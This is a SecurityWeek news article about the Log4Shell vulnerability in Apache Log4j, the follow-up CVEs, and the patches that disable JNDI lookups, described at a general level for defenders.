Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Problematic Log4j Functionality Disabled as More Security Issues Come to Light

Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light.

Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light.

It was discovered recently that Log4j version 2.x is affected by a critical remote code execution vulnerability that can be easily exploited to take complete control of a system. The flaw is tracked as CVE-2021-44228, Log4Shell and LogJam, and it has been exploited in attacks since December 1, days before an official patch was released.

Log4Shell attacks have been launched by profit-driven cybercriminals to deliver DDoS malware, cryptocurrency miners, ransomware, and other malicious programs, as well as by Chinese and Iranian state actors.

New Log4j vulnerabilities Exploitation of the vulnerability involves sending a specially crafted request to the targeted system. The request generates a log using Log4j, which leverages the Java Naming and Directory Interface (JNDI) lookup feature to perform a request to an attacker-controlled server, from which a malicious payload is fetched and executed.

CVE-2021-44228 was patched on December 6 with the release of Log4j 2.15.0. However, it was soon discovered that the fix was incomplete in certain non-default configurations, and exploitation could still lead to denial-of-service (DoS) attacks “or worse.”

A new CVE identifier, CVE-2021-45046, was assigned to this issue, and another round of updates was released. The latest versions of Log4j — versions 2.12.2 and 2.16.0 — not only patch this vulnerability, but also completely remove the message lookups feature and disable access to JNDI by default.

“JNDI lookups will now return a constant value. Also, Log4j now limits the protocols by default to only java,” Log4j developers said.

It has also come to light that while the risk of attacks against Log4j version 1.x is lower, systems running this version are still vulnerable to attacks if JNDI is used in their configuration. CVE-2021-4104 has been assigned to this issue and while patches will not be released because version 1.x is no longer supported, mitigations are available.

Risk Based Security has analyzed the three CVEs and noted that CVE-2021-4104 is an “entirely different attack vector.”

Advertisement. Scroll to continue reading.

The security firm pointed out that assigning a separate CVE to the incomplete fix for CVE-2021-44228 may be helpful to some organizations, but it can also cause confusion.

As companies scramble to assess impact, threat actors are increasingly exploiting the Log4Shell vulnerability in their attacks, and many organizations appear to be exposed.

“Wiz research shows that more than 89% of all environments have vulnerable Log4j libraries,” Ami Luttwak, co-founder and CTO of cloud security company Wiz, told SecurityWeek. “And in many of them, the dev teams are sure they have zero exposure — and are surprised to find out that some third-party component is actually built using Java.”

Check Point reported seeing more than one million attack attempts, nearly half of which have been linked to known malicious groups. The company said it had seen exploitation attempts against 44% of corporate networks around the world.

SecurityWeek has compiled a list of tools and other resources that can be useful for defenders concerned about the impact of the Log4Shell vulnerability on their organization.

Related: Industrial Organizations Targeted in Log4Shell Attacks

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Vulnerabilities

Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

CISO Strategy

SecurityWeek spoke with more than 300 cybersecurity experts to see what is bubbling beneath the surface, and examine how those evolving threats will present...

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...